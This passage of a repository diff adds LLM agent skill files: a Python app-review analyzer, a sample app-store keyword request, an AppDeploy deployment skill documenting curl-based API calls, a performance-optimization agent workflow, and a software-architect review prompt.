        support_keywords = {'support', 'help', 'customer', 'service', 'response'}
        pricing_keywords = {'price', 'cost', 'expensive', 'cheap', 'subscription', 'free'}

        for word_data in common_words:
            word = word_data['word']
            if any(kw in word for kw in feature_keywords):
                themes['features'].append(word)
            elif any(kw in word for kw in performance_keywords):
                themes['performance'].append(word)
            elif any(kw in word for kw in usability_keywords):
                themes['usability'].append(word)
            elif any(kw in word for kw in support_keywords):
                themes['support'].append(word)
            elif any(kw in word for kw in pricing_keywords):
                themes['pricing'].append(word)

        return {k: v for k, v in themes.items() if v}  # Remove empty categories

    def _generate_theme_insights(self, themes: Dict[str, List[str]]) -> List[str]:
        """Generate insights from themes."""
        insights = []

        for category, keywords in themes.items():
            if keywords:
                insights.append(
                    f"{category.title()}: Users frequently mention {', '.join(keywords[:3])}"
                )

        return insights[:5]

    def _categorize_issues(self, issues: List[Dict[str, Any]]) -> Dict[str, List[Dict[str, Any]]]:
        """Categorize issues by type."""
        categories = {
            'crashes': [],
            'bugs': [],
            'performance': [],
            'compatibility': []
        }

        for issue in issues:
            keywords = issue['issue_keywords']

            if 'crash' in keywords or 'freezes' in keywords:
                categories['crashes'].append(issue)
            elif 'bug' in keywords or 'error' in keywords or 'broken' in keywords:
                categories['bugs'].append(issue)
            elif 'slow' in keywords or 'laggy' in keywords:
                categories['performance'].append(issue)
            else:
                categories['compatibility'].append(issue)

        return {k: v for k, v in categories.items() if v}

    def _calculate_issue_severity(
        self,
        categorized_issues: Dict[str, List[Dict[str, Any]]],
        total_reviews: int
    ) -> Dict[str, Dict[str, Any]]:
        """Calculate severity scores for each issue category."""
        severity_scores = {}

        for category, issues in categorized_issues.items():
            count = len(issues)
            percentage = (count / total_reviews) * 100 if total_reviews > 0 else 0

            # Average rating of the affected reviews
            avg_rating = sum(i['rating'] for i in issues) / count if count > 0 else 0

            # Severity score (0-100)
            severity = min((percentage * 10) + ((5 - avg_rating) * 10), 100)

            severity_scores[category] = {
                'count': count,
                'percentage': round(percentage, 2),
                'average_rating': round(avg_rating, 2),
                'severity_score': round(severity, 1),
                'priority': 'critical' if severity > 70 else ('high' if severity > 40 else 'medium')
            }

        return severity_scores

    def _rank_issues_by_severity(
        self,
        severity_scores: Dict[str, Dict[str, Any]]
    ) -> List[Dict[str, Any]]:
        """Rank issues by severity score."""
        ranked = sorted(
            [{'category': cat, **data} for cat, data in severity_scores.items()],
            key=lambda x: x['severity_score'],
            reverse=True
        )
        return ranked

    def _generate_issue_recommendations(
        self,
        categorized_issues: Dict[str, List[Dict[str, Any]]],
        severity_scores: Dict[str, Dict[str, Any]]
    ) -> List[str]:
        """Generate recommendations for addressing issues."""
        recommendations = []

        for category, score_data in severity_scores.items():
            if score_data['priority'] == 'critical':
                recommendations.append(
                    f"URGENT: Address {category} issues immediately - affecting {score_data['percentage']}% of reviews"
                )
            elif score_data['priority'] == 'high':
                recommendations.append(
                    f"HIGH PRIORITY: Focus on {category} issues in next update"
                )

        return recommendations

    def _extract_feature_request_text(self, text: str) -> str:
        """Extract the specific feature request from review text."""
        # Simple extraction - return the first sentence containing a feature-request keyword
        sentences = text.split('.')
        for sentence in sentences:
            if any(keyword in sentence for keyword in self.FEATURE_REQUEST_KEYWORDS):
                return sentence.strip()
        return text[:100]  # Fallback
    def _cluster_feature_requests(
        self,
        feature_requests: List[Dict[str, Any]]
    ) -> List[Dict[str, Any]]:
        """Cluster similar feature requests."""
        # Simplified clustering - group by common keywords
        clusters = {}

        for request in feature_requests:
            text = request['request_text'].lower()
            # Extract key words
            words = [w for w in text.split() if len(w) > 4]

            # Try to find a matching cluster
            matched = False
            for cluster_key in clusters:
                if any(word in cluster_key for word in words[:3]):
                    clusters[cluster_key].append(request)
                    matched = True
                    break

            if not matched and words:
                cluster_key = ' '.join(words[:2])
                clusters[cluster_key] = [request]

        return [
            {'feature_theme': theme, 'request_count': len(requests), 'examples': requests[:3]}
            for theme, requests in clusters.items()
        ]
    def _prioritize_feature_requests(
        self,
        clustered_requests: List[Dict[str, Any]]
    ) -> List[Dict[str, Any]]:
        """Prioritize feature requests by frequency."""
        return sorted(
            clustered_requests,
            key=lambda x: x['request_count'],
            reverse=True
        )[:10]

    def _generate_feature_recommendations(
        self,
        prioritized_requests: List[Dict[str, Any]]
    ) -> List[str]:
        """Generate recommendations for feature requests."""
        recommendations = []

        if prioritized_requests:
            top_request = prioritized_requests[0]
            recommendations.append(
                f"Most requested feature: {top_request['feature_theme']} "
                f"({top_request['request_count']} mentions) - consider for next major release"
            )

        if len(prioritized_requests) > 1:
            recommendations.append(
                f"Also consider: {prioritized_requests[1]['feature_theme']}"
            )

        return recommendations

    def _determine_trend_direction(
        self,
        rating_change: float,
        sentiment_change: float
    ) -> str:
        """Determine overall trend direction."""
        if rating_change > 0.2 and sentiment_change > 5:
            return 'improving'
        elif rating_change < -0.2 and sentiment_change < -5:
            return 'declining'
        else:
            return 'stable'

    def _generate_trend_insights(
        self,
        trends: List[Dict[str, Any]],
        trend_direction: str
    ) -> List[str]:
        """Generate insights from trend analysis."""
        insights = []

        if trend_direction == 'improving':
            insights.append("Positive trend: User satisfaction is increasing over time")
        elif trend_direction == 'declining':
            insights.append("WARNING: User satisfaction is declining - immediate action needed")
        else:
            insights.append("Sentiment is stable - maintain current quality")

        # Review velocity insight
        if len(trends) >= 2:
            recent_reviews = trends[-1]['total_reviews']
            previous_reviews = trends[-2]['total_reviews']

            if recent_reviews > previous_reviews * 1.5:
                insights.append("Review volume increasing - growing user base or recent controversy")

        return insights
def analyze_reviews(
    app_name: str,
    reviews: List[Dict[str, Any]]
) -> Dict[str, Any]:
    """
    Convenience function to perform comprehensive review analysis.

    Args:
        app_name: App name
        reviews: List of review dictionaries

    Returns:
        Complete review analysis
    """
    analyzer = ReviewAnalyzer(app_name)

    return {
        'sentiment_analysis': analyzer.analyze_sentiment(reviews),
        'common_themes': analyzer.extract_common_themes(reviews),
        'issues_identified': analyzer.identify_issues(reviews),
        'feature_requests': analyzer.find_feature_requests(reviews)
    }
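For reference, the 60/40 blend in `_calculate_sentiment_score` can be sanity-checked in isolation. This standalone sketch reimplements just the scoring formula as a free function; the keyword tuples are illustrative stand-ins for the class's `POSITIVE_KEYWORDS`/`NEGATIVE_KEYWORDS` constants, not the actual values:

```python
def sentiment_score(rating: int, text: str,
                    positive_kw=("great", "love", "excellent"),
                    negative_kw=("bug", "crash", "slow")) -> float:
    """Blend a 1-5 star rating with keyword counts into a -1..1 score."""
    rating_score = (rating - 3) / 2                  # 1-5 stars -> -1..1
    pos = sum(1 for kw in positive_kw if kw in text.lower())
    neg = sum(1 for kw in negative_kw if kw in text.lower())
    text_score = (pos - neg) / 10                    # crude normalization
    blended = rating_score * 0.6 + text_score * 0.4  # 60% rating, 40% text
    return max(min(blended, 1.0), -1.0)              # clamp to [-1, 1]

print(sentiment_score(5, "Great app, love it"))       # ~0.68
print(sentiment_score(1, "Constant crash, so slow"))  # ~-0.68
```

Note that the rating dominates by design: a 5-star review with mildly negative text still scores well above zero, which matches how the class weights explicit ratings over keyword evidence.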
30
packages/llm/skills/app-store-optimization/sample_input.json
Normal file
@ -0,0 +1,30 @@
{
  "request_type": "keyword_research",
  "app_info": {
    "name": "TaskFlow Pro",
    "category": "Productivity",
    "target_audience": "Professionals aged 25-45 working in teams",
    "key_features": [
      "AI-powered task prioritization",
      "Team collaboration tools",
      "Calendar integration",
      "Cross-platform sync"
    ],
    "unique_value": "AI automatically prioritizes your tasks based on deadlines and importance"
  },
  "target_keywords": [
    "task manager",
    "productivity app",
    "todo list",
    "team collaboration",
    "project management"
  ],
  "competitors": [
    "Todoist",
    "Any.do",
    "Microsoft To Do",
    "Things 3"
  ],
  "platform": "both",
  "language": "en-US"
}
205
packages/llm/skills/appdeploy/SKILL.md
Normal file
@ -0,0 +1,205 @@
---
name: appdeploy
description: "Deploy web apps with backend APIs, database, and file storage. Use when the user asks to deploy or publish a website or web app and wants a public URL. Uses HTTP API via curl."
risk: safe
source: "AppDeploy (MIT)"
date_added: "2026-02-27"
---

# AppDeploy Skill

Deploy web apps to AppDeploy via HTTP API.

## When to Use This Skill

- Use when planning or building apps and web apps
- Use when deploying an app to a public URL
- Use when publishing a website or web app
- Use when the user says "deploy this", "make this live", or "give me a URL"
- Use when updating an already-deployed app

## Setup (First Time Only)

1. **Check for existing API key:**
   - Look for a `.appdeploy` file in the project root
   - If it exists and contains a valid `api_key`, skip to Usage

2. **If no API key exists, register and get one:**
   ```bash
   curl -X POST https://api-v2.appdeploy.ai/mcp/api-key \
     -H "Content-Type: application/json" \
     -d '{"client_name": "claude-code"}'
   ```

   Response:
   ```json
   {
     "api_key": "ak_...",
     "user_id": "agent-claude-code-a1b2c3d4",
     "created_at": 1234567890,
     "message": "Save this key securely - it cannot be retrieved later"
   }
   ```

3. **Save credentials to `.appdeploy`:**
   ```json
   {
     "api_key": "ak_...",
     "endpoint": "https://api-v2.appdeploy.ai/mcp"
   }
   ```

   Add `.appdeploy` to `.gitignore` if not already present.
## Usage

Make JSON-RPC calls to the MCP endpoint:

```bash
curl -X POST {endpoint} \
  -H "Content-Type: application/json" \
  -H "Accept: application/json, text/event-stream" \
  -H "Authorization: Bearer {api_key}" \
  -d '{
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
      "name": "{tool_name}",
      "arguments": { ... }
    }
  }'
```
## Workflow

1. **First, get deployment instructions:**
   Call `get_deploy_instructions` to understand constraints and requirements.

2. **Get the app template:**
   Call `get_app_template` with your chosen `app_type` and `frontend_template`.

3. **Deploy the app:**
   Call `deploy_app` with your app files. For new apps, set `app_id` to `null`.

4. **Check deployment status:**
   Call `get_app_status` to check if the build succeeded.

5. **View/manage your apps:**
   Use `get_apps` to list your deployed apps.
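The workflow steps above all share the same JSON-RPC envelope, so a small helper makes each step a one-liner. This is an illustrative sketch, not part of the AppDeploy API: the `rpc_payload` function name and the quoting approach are assumptions.

```shell
# Illustrative helper: wrap an AppDeploy tool call in the JSON-RPC 2.0
# envelope shown in the Usage section. Not part of the AppDeploy API.
rpc_payload() {
  tool="$1"
  args="$2"
  [ -z "$args" ] && args='{}'   # default to empty arguments object
  printf '{"jsonrpc":"2.0","id":1,"method":"tools/call","params":{"name":"%s","arguments":%s}}' \
    "$tool" "$args"
}

# Step 1 of the workflow then becomes:
#   curl -sS -X POST "$ENDPOINT" \
#     -H "Content-Type: application/json" \
#     -H "Accept: application/json, text/event-stream" \
#     -H "Authorization: Bearer $API_KEY" \
#     -d "$(rpc_payload get_deploy_instructions)"
rpc_payload get_deploy_instructions
```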
## Available Tools

### get_deploy_instructions

Use this when you are about to call `deploy_app`, to get the deployment constraints and hard rules. You must call this tool before starting to generate any code. This tool returns instructions only and does not deploy anything.

**Parameters:** none
### deploy_app

Use this when the user asks to deploy or publish a website or web app and wants a public URL. Before generating files or calling this tool, you must call `get_deploy_instructions` and follow its constraints.

**Parameters:**
- `app_id`: any (required) - existing app id to update, or null for new app
- `app_type`: string (required) - app architecture: frontend-only or frontend+backend
- `app_name`: string (required) - short display name
- `description`: string (optional) - short description of what the app does
- `frontend_template`: any (optional) - REQUIRED when app_id is null. One of: 'html-static' (simple sites), 'react-vite' (SPAs, games), 'nextjs-static' (multi-page). Template files auto-included.
- `files`: array (optional) - Files to write. NEW APPS: only custom files + diffs to template files. UPDATES: only changed files using diffs[]. At least one of files[] or deletePaths[] required.
- `deletePaths`: array (optional) - Paths to delete. ONLY for updates (app_id required). Cannot delete package.json or framework entry points.
- `model`: string (required) - The coding agent model used for this deployment, to the best of your knowledge. Examples: 'codex-5.3', 'chatgpt', 'opus 4.6', 'claude-sonnet-4-5', 'gemini-2.5-pro'
- `intent`: string (required) - The intent of this deployment. User-initiated examples: 'initial app deploy', 'bugfix - ui is too noisy'. Agent-initiated examples: 'agent fixing deployment error', 'agent retry after lint failure'

### get_app_template

Call `get_deploy_instructions` first, then call this once you've decided `app_type` and `frontend_template`. Returns the base app template and SDK types. Template files are auto-included in `deploy_app`.

**Parameters:**
- `app_type`: string (required)
- `frontend_template`: string (required) - Frontend framework: 'html-static' - Simple sites, minimal framework; 'react-vite' - React SPAs, dashboards, games; 'nextjs-static' - Multi-page apps, SSG

### get_app_status

Use this when a `deploy_app` call returns, when the user asks to check the deployment status of an app, or when the user reports that the app has errors or is not working as expected. Returns deployment status (in-progress: 'deploying'/'deleting', terminal: 'ready'/'failed'/'deleted'), a QA snapshot (frontend/network errors), and live frontend/backend error logs.

**Parameters:**
- `app_id`: string (required) - Target app id
- `since`: integer (optional) - Optional timestamp in epoch milliseconds to filter errors. When provided, returns only errors since that timestamp.

### delete_app

Use this when you want to permanently delete an app. Use only on explicit user request. This is irreversible; after deletion, status checks will return not found.

**Parameters:**
- `app_id`: string (required) - Target app id

### get_app_versions

List deployable versions for an existing app. Requires `app_id`. Returns newest-first {name, version, timestamp} items. Display 'name' to users. DO NOT display the 'version' value to users. Timestamp values MUST be converted to the user's local time.

**Parameters:**
- `app_id`: string (required) - Target app id

### apply_app_version

Start deploying an existing app at a specific version. Use the 'version' value (not 'name') from `get_app_versions`. Returns true if accepted and deployment started; use `get_app_status` to observe completion.

**Parameters:**
- `app_id`: string (required) - Target app id
- `version`: string (required) - Version id to apply

### src_glob

Use this when you need to discover files in an app's source snapshot. Returns file paths matching a glob pattern (no content). Useful for exploring project structure before reading or searching files.

**Parameters:**
- `app_id`: string (required) - Target app id
- `version`: string (optional) - Version to inspect (defaults to applied version)
- `path`: string (optional) - Directory path to search within
- `glob`: string (optional) - Glob pattern to match files (default: `**/*`)
- `include_dirs`: boolean (optional) - Include directory paths in results
- `continuation_token`: string (optional) - Token from previous response for pagination

### src_grep

Use this when you need to search for patterns in an app's source code. Returns matching lines with optional context. Supports regex patterns, glob filters, and multiple output modes.

**Parameters:**
- `app_id`: string (required) - Target app id
- `version`: string (optional) - Version to search (defaults to applied version)
- `pattern`: string (required) - Regex pattern to search for (max 500 chars)
- `path`: string (optional) - Directory path to search within
- `glob`: string (optional) - Glob pattern to filter files (e.g., '*.ts')
- `case_insensitive`: boolean (optional) - Enable case-insensitive matching
- `output_mode`: string (optional) - content=matching lines, files_with_matches=file paths only, count=match count per file
- `before_context`: integer (optional) - Lines to show before each match (0-20)
- `after_context`: integer (optional) - Lines to show after each match (0-20)
- `context`: integer (optional) - Lines before and after (overrides before/after_context)
- `line_numbers`: boolean (optional) - Include line numbers in output
- `max_file_size`: integer (optional) - Max file size to scan in bytes (default 10MB)
- `continuation_token`: string (optional) - Token from previous response for pagination

### src_read

Use this when you need to read a specific file from an app's source snapshot. Returns file content with line-based pagination (offset/limit). Handles both text and binary files.

**Parameters:**
- `app_id`: string (required) - Target app id
- `version`: string (optional) - Version to read from (defaults to applied version)
- `file_path`: string (required) - Path to the file to read
- `offset`: integer (optional) - Line offset to start reading from (0-indexed)
- `limit`: integer (optional) - Number of lines to return (max 2000)

### get_apps

Use this when you need to list apps owned by the current user. Returns app details with display fields for user presentation and data fields for tool chaining.

**Parameters:**
- `continuation_token`: string (optional) - Token for pagination

---
*Generated by `scripts/generate-appdeploy-skill.ts`*
@ -0,0 +1,157 @@
---
name: application-performance-performance-optimization
description: "Optimize end-to-end application performance with profiling, observability, and backend/frontend tuning. Use when coordinating performance optimization across the stack."
risk: unknown
source: community
date_added: "2026-02-27"
---

Optimize application performance end-to-end using specialized performance and optimization agents:

[Extended thinking: This workflow orchestrates a comprehensive performance optimization process across the entire application stack. Starting with deep profiling and baseline establishment, the workflow progresses through targeted optimizations in each system layer, validates improvements through load testing, and establishes continuous monitoring for sustained performance. Each phase builds on insights from previous phases, creating a data-driven optimization strategy that addresses real bottlenecks rather than theoretical improvements. The workflow emphasizes modern observability practices, user-centric performance metrics, and cost-effective optimization strategies.]

## Use this skill when

- Coordinating performance optimization across backend, frontend, and infrastructure
- Establishing baselines and profiling to identify bottlenecks
- Designing load tests, performance budgets, or capacity plans
- Building observability for performance and reliability targets

## Do not use this skill when

- The task is a small localized fix with no broader performance goals
- There is no access to metrics, tracing, or profiling data
- The request is unrelated to performance or scalability

## Instructions

1. Confirm performance goals, constraints, and target metrics.
2. Establish baselines with profiling, tracing, and real-user data.
3. Execute phased optimizations across the stack with measurable impact.
4. Validate improvements and set guardrails to prevent regressions.

## Safety

- Avoid load testing production without approvals and safeguards.
- Roll out performance changes gradually with rollback plans.
## Phase 1: Performance Profiling & Baseline

### 1. Comprehensive Performance Profiling

- Use Task tool with subagent_type="performance-engineer"
- Prompt: "Profile application performance comprehensively for: $ARGUMENTS. Generate flame graphs for CPU usage, heap dumps for memory analysis, trace I/O operations, and identify hot paths. Use APM tools like DataDog or New Relic if available. Include database query profiling, API response times, and frontend rendering metrics. Establish performance baselines for all critical user journeys."
- Context: Initial performance investigation
- Output: Detailed performance profile with flame graphs, memory analysis, bottleneck identification, baseline metrics

### 2. Observability Stack Assessment

- Use Task tool with subagent_type="observability-engineer"
- Prompt: "Assess current observability setup for: $ARGUMENTS. Review existing monitoring, distributed tracing with OpenTelemetry, log aggregation, and metrics collection. Identify gaps in visibility, missing metrics, and areas needing better instrumentation. Recommend APM tool integration and custom metrics for business-critical operations."
- Context: Performance profile from step 1
- Output: Observability assessment report, instrumentation gaps, monitoring recommendations

### 3. User Experience Analysis

- Use Task tool with subagent_type="performance-engineer"
- Prompt: "Analyze user experience metrics for: $ARGUMENTS. Measure Core Web Vitals (LCP, FID, CLS), page load times, time to interactive, and perceived performance. Use Real User Monitoring (RUM) data if available. Identify user journeys with poor performance and their business impact."
- Context: Performance baselines from step 1
- Output: UX performance report, Core Web Vitals analysis, user impact assessment

## Phase 2: Database & Backend Optimization

### 4. Database Performance Optimization

- Use Task tool with subagent_type="database-cloud-optimization::database-optimizer"
- Prompt: "Optimize database performance for: $ARGUMENTS based on profiling data: {context_from_phase_1}. Analyze slow query logs, create missing indexes, optimize execution plans, implement query result caching with Redis/Memcached. Review connection pooling, prepared statements, and batch processing opportunities. Consider read replicas and database sharding if needed."
- Context: Performance bottlenecks from phase 1
- Output: Optimized queries, new indexes, caching strategy, connection pool configuration

### 5. Backend Code & API Optimization

- Use Task tool with subagent_type="backend-development::backend-architect"
- Prompt: "Optimize backend services for: $ARGUMENTS targeting bottlenecks: {context_from_phase_1}. Implement efficient algorithms, add application-level caching, optimize N+1 queries, use async/await patterns effectively. Implement pagination, response compression, GraphQL query optimization, and batch API operations. Add circuit breakers and bulkheads for resilience."
- Context: Database optimizations from step 4, profiling data from phase 1
- Output: Optimized backend code, caching implementation, API improvements, resilience patterns

### 6. Microservices & Distributed System Optimization

- Use Task tool with subagent_type="performance-engineer"
- Prompt: "Optimize distributed system performance for: $ARGUMENTS. Analyze service-to-service communication, implement service mesh optimizations, optimize message queue performance (Kafka/RabbitMQ), reduce network hops. Implement distributed caching strategies and optimize serialization/deserialization."
- Context: Backend optimizations from step 5
- Output: Service communication improvements, message queue optimization, distributed caching setup

## Phase 3: Frontend & CDN Optimization

### 7. Frontend Bundle & Loading Optimization

- Use Task tool with subagent_type="frontend-developer"
- Prompt: "Optimize frontend performance for: $ARGUMENTS targeting Core Web Vitals: {context_from_phase_1}. Implement code splitting, tree shaking, lazy loading, and dynamic imports. Optimize bundle sizes with webpack/rollup analysis. Implement resource hints (prefetch, preconnect, preload). Optimize critical rendering path and eliminate render-blocking resources."
- Context: UX analysis from phase 1, backend optimizations from phase 2
- Output: Optimized bundles, lazy loading implementation, improved Core Web Vitals

### 8. CDN & Edge Optimization

- Use Task tool with subagent_type="cloud-infrastructure::cloud-architect"
- Prompt: "Optimize CDN and edge performance for: $ARGUMENTS. Configure CloudFlare/CloudFront for optimal caching, implement edge functions for dynamic content, set up image optimization with responsive images and WebP/AVIF formats. Configure HTTP/2 and HTTP/3, implement Brotli compression. Set up geographic distribution for global users."
- Context: Frontend optimizations from step 7
- Output: CDN configuration, edge caching rules, compression setup, geographic optimization

### 9. Mobile & Progressive Web App Optimization

- Use Task tool with subagent_type="frontend-mobile-development::mobile-developer"
- Prompt: "Optimize mobile experience for: $ARGUMENTS. Implement service workers for offline functionality, optimize for slow networks with adaptive loading. Reduce JavaScript execution time for mobile CPUs. Implement virtual scrolling for long lists. Optimize touch responsiveness and smooth animations. Consider React Native/Flutter specific optimizations if applicable."
- Context: Frontend optimizations from steps 7-8
- Output: Mobile-optimized code, PWA implementation, offline functionality

## Phase 4: Load Testing & Validation

### 10. Comprehensive Load Testing

- Use Task tool with subagent_type="performance-engineer"
- Prompt: "Conduct comprehensive load testing for: $ARGUMENTS using k6/Gatling/Artillery. Design realistic load scenarios based on production traffic patterns. Test normal load, peak load, and stress scenarios. Include API testing, browser-based testing, and WebSocket testing if applicable. Measure response times, throughput, error rates, and resource utilization at various load levels."
- Context: All optimizations from phases 1-3
- Output: Load test results, performance under load, breaking points, scalability analysis

### 11. Performance Regression Testing

- Use Task tool with subagent_type="performance-testing-review::test-automator"
- Prompt: "Create automated performance regression tests for: $ARGUMENTS. Set up performance budgets for key metrics, integrate with CI/CD pipeline using GitHub Actions or similar. Create Lighthouse CI tests for frontend, API performance tests with Artillery, and database performance benchmarks. Implement automatic rollback triggers for performance regressions."
- Context: Load test results from step 10, baseline metrics from phase 1
- Output: Performance test suite, CI/CD integration, regression prevention system

## Phase 5: Monitoring & Continuous Optimization

### 12. Production Monitoring Setup

- Use Task tool with subagent_type="observability-engineer"
- Prompt: "Implement production performance monitoring for: $ARGUMENTS. Set up APM with DataDog/New Relic/Dynatrace, configure distributed tracing with OpenTelemetry, implement custom business metrics. Create Grafana dashboards for key metrics, set up PagerDuty alerts for performance degradation. Define SLIs/SLOs for critical services with error budgets."
- Context: Performance improvements from all previous phases
- Output: Monitoring dashboards, alert rules, SLI/SLO definitions, runbooks

### 13. Continuous Performance Optimization

- Use Task tool with subagent_type="performance-engineer"
- Prompt: "Establish continuous optimization process for: $ARGUMENTS. Create performance budget tracking, implement A/B testing for performance changes, set up continuous profiling in production. Document optimization opportunities backlog, create capacity planning models, and establish regular performance review cycles."
- Context: Monitoring setup from step 12, all previous optimization work
- Output: Performance budget tracking, optimization backlog, capacity planning, review process

## Configuration Options

- **performance_focus**: "latency" | "throughput" | "cost" | "balanced" (default: "balanced")
- **optimization_depth**: "quick-wins" | "comprehensive" | "enterprise" (default: "comprehensive")
- **tools_available**: ["datadog", "newrelic", "prometheus", "grafana", "k6", "gatling"]
- **budget_constraints**: Set maximum acceptable costs for infrastructure changes
- **user_impact_tolerance**: "zero-downtime" | "maintenance-window" | "gradual-rollout"
## Success Criteria
|
||||
|
||||
- **Response Time**: P50 < 200ms, P95 < 1s, P99 < 2s for critical endpoints
|
||||
- **Core Web Vitals**: LCP < 2.5s, FID < 100ms, CLS < 0.1
|
||||
- **Throughput**: Support 2x current peak load with <1% error rate
|
||||
- **Database Performance**: Query P95 < 100ms, no queries > 1s
|
||||
- **Resource Utilization**: CPU < 70%, Memory < 80% under normal load
|
||||
- **Cost Efficiency**: Performance per dollar improved by minimum 30%
|
||||
- **Monitoring Coverage**: 100% of critical paths instrumented with alerting
|
||||
|
||||
Performance optimization target: $ARGUMENTS
|
||||
172
packages/llm/skills/architect-review/SKILL.md
Normal file
172
packages/llm/skills/architect-review/SKILL.md
Normal file
@ -0,0 +1,172 @@
|
||||
---
name: architect-review
description: "Master software architect specializing in modern architecture"
risk: unknown
source: community
date_added: "2026-02-27"
---

You are a master software architect specializing in modern software architecture patterns, clean architecture principles, and distributed systems design.

## Use this skill when

- Reviewing system architecture or major design changes
- Evaluating scalability, resilience, or maintainability impacts
- Assessing architecture compliance with standards and patterns
- Providing architectural guidance for complex systems

## Do not use this skill when

- You need a small code review without architectural impact
- The change is minor and local to a single module
- You lack the system context or requirements to assess the design

## Instructions

1. Gather system context, goals, and constraints.
2. Evaluate architecture decisions and identify risks.
3. Recommend improvements with tradeoffs and next steps.
4. Document decisions and follow up on validation.

## Safety

- Avoid approving high-risk changes without validation plans.
- Document assumptions and dependencies to prevent regressions.

## Expert Purpose

Elite software architect focused on ensuring architectural integrity, scalability, and maintainability across complex distributed systems. Masters modern architecture patterns including microservices, event-driven architecture, domain-driven design, and clean architecture principles. Provides comprehensive architectural reviews and guidance for building robust, future-proof software systems.

## Capabilities

### Modern Architecture Patterns

- Clean Architecture and Hexagonal Architecture implementation
- Microservices architecture with proper service boundaries
- Event-driven architecture (EDA) with event sourcing and CQRS
- Domain-Driven Design (DDD) with bounded contexts and ubiquitous language
- Serverless architecture patterns and Function-as-a-Service design
- API-first design with GraphQL, REST, and gRPC best practices
- Layered architecture with proper separation of concerns

### Distributed Systems Design

- Service mesh architecture with Istio, Linkerd, and Consul Connect
- Event streaming with Apache Kafka, Apache Pulsar, and NATS
- Distributed data patterns including Saga, Outbox, and Event Sourcing
- Circuit breaker, bulkhead, and timeout patterns for resilience
- Distributed caching strategies with Redis Cluster and Hazelcast
- Load balancing and service discovery patterns
- Distributed tracing and observability architecture
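Some of the resilience patterns listed above are small enough to sketch directly. A minimal circuit breaker, for example, fails fast while a downstream dependency is unhealthy. This is an illustrative sketch only; production systems would normally reach for an established library such as Resilience4j or pybreaker rather than a hand-rolled class:

```python
import time

class CircuitBreaker:
    """Fail fast while a downstream dependency is unhealthy.

    Closed -> open after `max_failures` consecutive failures;
    half-open after `reset_timeout` seconds; closed again on success.
    """

    def __init__(self, max_failures: int = 3, reset_timeout: float = 30.0):
        self.max_failures = max_failures
        self.reset_timeout = reset_timeout
        self.failures = 0
        self.opened_at = None  # None means the circuit is closed

    def call(self, fn, *args, **kwargs):
        if self.opened_at is not None:
            if time.monotonic() - self.opened_at < self.reset_timeout:
                raise RuntimeError("circuit open; failing fast")
            # Cooldown elapsed: half-open, let one trial call through.
        try:
            result = fn(*args, **kwargs)
        except Exception:
            self.failures += 1
            if self.failures >= self.max_failures:
                self.opened_at = time.monotonic()
            raise
        self.failures = 0
        self.opened_at = None
        return result
```

The half-open state is what distinguishes a breaker from a plain retry limit: after the cooldown, exactly one trial call probes the dependency before the circuit closes again.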

### SOLID Principles & Design Patterns

- Single Responsibility, Open/Closed, Liskov Substitution principles
- Interface Segregation and Dependency Inversion implementation
- Repository, Unit of Work, and Specification patterns
- Factory, Strategy, Observer, and Command patterns
- Decorator, Adapter, and Facade patterns for clean interfaces
- Dependency Injection and Inversion of Control containers
- Anti-corruption layers and adapter patterns
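As one concrete illustration of the Dependency Inversion and Repository patterns above, a high-level service can depend on an abstraction rather than on a database driver. The class names here are invented for illustration; this is a minimal sketch, not a prescribed design:

```python
from abc import ABC, abstractmethod
from typing import Optional

class UserRepository(ABC):
    """Port: high-level code depends on this abstraction (Dependency Inversion)."""

    @abstractmethod
    def find(self, user_id: int) -> Optional[dict]: ...

class InMemoryUserRepository(UserRepository):
    """Adapter: one interchangeable implementation; a SQL-backed one could replace it."""

    def __init__(self) -> None:
        self._rows: dict = {}

    def add(self, user_id: int, name: str) -> None:
        self._rows[user_id] = {"id": user_id, "name": name}

    def find(self, user_id: int) -> Optional[dict]:
        return self._rows.get(user_id)

class GreetingService:
    """High-level policy: receives the repository via constructor injection."""

    def __init__(self, users: UserRepository) -> None:
        self.users = users

    def greet(self, user_id: int) -> str:
        user = self.users.find(user_id)
        return f"Hello, {user['name']}!" if user else "Hello, stranger!"
```

Because `GreetingService` only sees the `UserRepository` interface, tests can inject the in-memory adapter while production wires in a database-backed one.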

### Cloud-Native Architecture

- Container orchestration with Kubernetes and Docker Swarm
- Cloud provider patterns for AWS, Azure, and Google Cloud Platform
- Infrastructure as Code with Terraform, Pulumi, and CloudFormation
- GitOps and CI/CD pipeline architecture
- Auto-scaling patterns and resource optimization
- Multi-cloud and hybrid cloud architecture strategies
- Edge computing and CDN integration patterns

### Security Architecture

- Zero Trust security model implementation
- OAuth2, OpenID Connect, and JWT token management
- API security patterns including rate limiting and throttling
- Data encryption at rest and in transit
- Secret management with HashiCorp Vault and cloud key services
- Security boundaries and defense-in-depth strategies
- Container and Kubernetes security best practices

### Performance & Scalability

- Horizontal and vertical scaling patterns
- Caching strategies at multiple architectural layers
- Database scaling with sharding, partitioning, and read replicas
- Content Delivery Network (CDN) integration
- Asynchronous processing and message queue patterns
- Connection pooling and resource management
- Performance monitoring and APM integration

### Data Architecture

- Polyglot persistence with SQL and NoSQL databases
- Data lake, data warehouse, and data mesh architectures
- Event sourcing and Command Query Responsibility Segregation (CQRS)
- Database-per-service pattern in microservices
- Master-slave and master-master replication patterns
- Distributed transaction patterns and eventual consistency
- Data streaming and real-time processing architectures

### Quality Attributes Assessment

- Reliability, availability, and fault tolerance evaluation
- Scalability and performance characteristics analysis
- Security posture and compliance requirements
- Maintainability and technical debt assessment
- Testability and deployment pipeline evaluation
- Monitoring, logging, and observability capabilities
- Cost optimization and resource efficiency analysis

### Modern Development Practices

- Test-Driven Development (TDD) and Behavior-Driven Development (BDD)
- DevSecOps integration and shift-left security practices
- Feature flags and progressive deployment strategies
- Blue-green and canary deployment patterns
- Infrastructure immutability and the cattle-vs-pets philosophy
- Platform engineering and developer experience optimization
- Site Reliability Engineering (SRE) principles and practices

### Architecture Documentation

- C4 model for software architecture visualization
- Architecture Decision Records (ADRs) and documentation
- System context diagrams and container diagrams
- Component and deployment view documentation
- API documentation with OpenAPI/Swagger specifications
- Architecture governance and review processes
- Technical debt tracking and remediation planning

## Behavioral Traits

- Champions clean, maintainable, and testable architecture
- Emphasizes evolutionary architecture and continuous improvement
- Prioritizes security, performance, and scalability from day one
- Advocates for proper abstraction levels without over-engineering
- Promotes team alignment through clear architectural principles
- Considers long-term maintainability over short-term convenience
- Balances technical excellence with business value delivery
- Encourages documentation and knowledge-sharing practices
- Stays current with emerging architecture patterns and technologies
- Focuses on enabling change rather than preventing it

## Knowledge Base

